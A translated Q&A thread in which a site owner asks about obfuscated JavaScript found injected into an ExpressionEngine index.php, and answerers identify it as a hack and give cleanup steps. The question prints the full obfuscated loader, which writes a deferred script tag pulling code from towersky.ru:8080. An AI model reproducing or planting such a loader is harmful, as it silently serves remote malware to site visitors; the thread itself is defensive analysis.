Странный JavaScript в Шаблоне. Действительно ли это - попытка взламывания?
Я проверил веб-сайт своего клиента к xHTML, Строгому 1.0/CSS 2,1 стандарта на прошлой неделе. Сегодня, когда я перепроверил, мне вызвал ошибку проверки странный и предыдущий неизвестный сценарий. Я нашел это в index.php файле моего ExpressionEngine CMS. Действительно ли это - попытка взламывания, как я подозревал? Я не мог не заметить российский домен, закодированный в сценарии...
Что делает этот JavaScript? Я должен объяснить определенные опасности для своего клиента.
this.v=27047;
this.v+=187;
ug=["n"];
OV=29534;
OV--;
var y;
var C="C";
var T={};
r=function(){
b=36068;
b-=144;
M=[];
function f(V,w,U){
return V.substr(w,U);
var wH=39640;
}
var L=["o"];
var cj={};
var qK={N:false};
var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
var BT="BT";
var fV=RegExp;
var CE={bf:false};
var UW='';
this.Ky=11592;
this.Ky-=237;
var VU=document;
var _n=[];
try {} catch(wP){};
this.JY=29554;
this.JY-=245;
function s(V,w){
l=13628;
l--;
var U="["+w+String("]");
var rk=new fV(U, f("giId",0,1));
this.NS=18321;this.NS+=195;return V.replace(rk, UW);
try {} catch(k){};
};
this.jM="";
var CT={};
var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');
try {var vv='m'} catch(vv){};
var Os={};
var t=null;
var e=String("bod"+"y");
var F=155183-147103;
this.kp='';
Z={Ug:false};
y=function(){
var kl=["mF","Q","cR"];
try {
Bf=11271;
Bf-=179;
var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
Fp=VU[u](A);
var H="";
try {} catch(WK){};
this.Ca=19053;
this.Ca--;
var O=s('s5rLcI','2A5IhLo');
var V=F+fa;
this.bK="";
var ya=String("de"+"fe"+f("r3bPZ",0,1));
var bk=new String();
pB=9522;
pB++;
Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
Fp[ya]=[1][0];
Pe=45847;
Pe--;
VU[e].appendChild(Fp);
var lg=new Array();
var aQ={vl:"JC"};
this.KL="KL";
}
catch(x){
this.Ja="";
Th=["pj","zx","kO"];
var Jr='';
};
Tr={qZ:21084};
};
this.pL=false;
};
be={};
rkE={hb:"vG"};
r();
var bY=new Date();
window.onload=y;
cU=["Yr","gv"];
4 ответа
Да. Сайт был взломан.
Что вам нужно сделать, это:
- Убедитесь, что каждый, у кого есть доступ к этим паролям, запустил обновленное сканирование вирусов на компьютерах, с которых они могли войти на сайт.
- Убедитесь, что вы изменили все пароли для входа и администратора.
- Если возможно, вам, вероятно, следует вернуться к кодовой базе, которая была до того, как вы столкнулись с этим.
- Проверьте время модификации сценария, в котором вы нашли этот фрагмент (если еще не поздно), и поищите другие файлы, которые были изменены примерно в это время. Сценарий, скорее всего, сгенерирован случайным образом, поэтому поиск его частей вряд ли будет окончательным.
Если этому сценарию удалось проникнуть внутрь, то и другим. Нередко веб-сайты взламываются с помощью троянских программ для кейлоггеров на компьютерах тех, кто на них входит.
См. http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity
Приведенный выше код записывает код, который активирует код на русском сайте ( http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php ), который добавляет невидимый DIV, содержащий iFrame, который, как я полагаю, содержит изображение щенка.
Сценарий в основном добавляет следующую строку к вашему закрывающему тегу тела:
<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"></script>
Итак, он пытается загрузить внешний скрипт на ваш сайт. Я не уверен, что делает этот сценарий, но, без сомнения, ничего хорошего в этом нет.
Кроме того, быстрый поиск по «towerersky.ru» в Google показывает списки вредоносных веб-сайтов, содержащих этот сайт.
Учитывая, что я даже не мог загрузить эту страницу в Windows, потому что мой AV остановил меня да, это вирус.